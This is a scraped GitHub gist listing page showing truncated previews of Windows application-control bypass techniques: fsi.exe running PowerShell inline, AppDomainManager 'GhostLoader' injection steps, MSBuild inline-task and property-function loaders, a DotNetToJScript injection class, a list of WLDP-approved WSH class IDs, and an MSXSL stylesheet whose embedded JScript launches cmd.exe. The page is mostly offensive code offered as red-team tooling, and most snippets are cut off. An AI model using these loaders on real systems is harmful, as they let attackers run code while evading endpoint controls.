Skip to content

Instantly share code, notes, and snippets.

@bohops
bohops / fsharp.fsscript
Created Oct 22, 2020 — forked from NickTyrer/fsharp.fsscript
fsi.exe inline execution
View fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()
@bohops
bohops / _Instructions_Reproduce.md
Created Apr 30, 2020
GhostLoader - AppDomainManager - Injection - 攻壳机动队
View _Instructions_Reproduce.md

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
@bohops
bohops / poc.png
Created May 22, 2019
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@bohops
bohops / WSH_approved_list.txt
Created Mar 13, 2019
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
View WSH_approved_list.txt
041e868e-0c7d-48c6-965f-5fd576530e5b
0438c02b-eb9c-4e42-81ad-407f6cd6cde1
078b1f7d-c34c-4b13-a7c3-9663901650f1
0abb2961-2cc1-4f1d-be8e-9d330d06b77d
0d7237e6-930f-4682-ad0a-52ebffd3aee3
0d972387-817b-46e7-913f-e9993ff401eb
0e770b12-7221-4a5d-86ee-77310a5506bb
0fa57208-5100-4cd6-955c-fe69f8898973
1080a020-2b47-4da9-8095-dbc9cefffc04
10cf2e12-1681-4c53-adc0-932c84832cd8
@bohops
bohops / minimalist.xml
Created Nov 4, 2018
MSXSL Single File Payload
View minimalist.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
@bohops
bohops / Inject.cs
Created Oct 30, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@bohops
bohops / JankyAF.csproj
Last active Apr 28, 2022
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >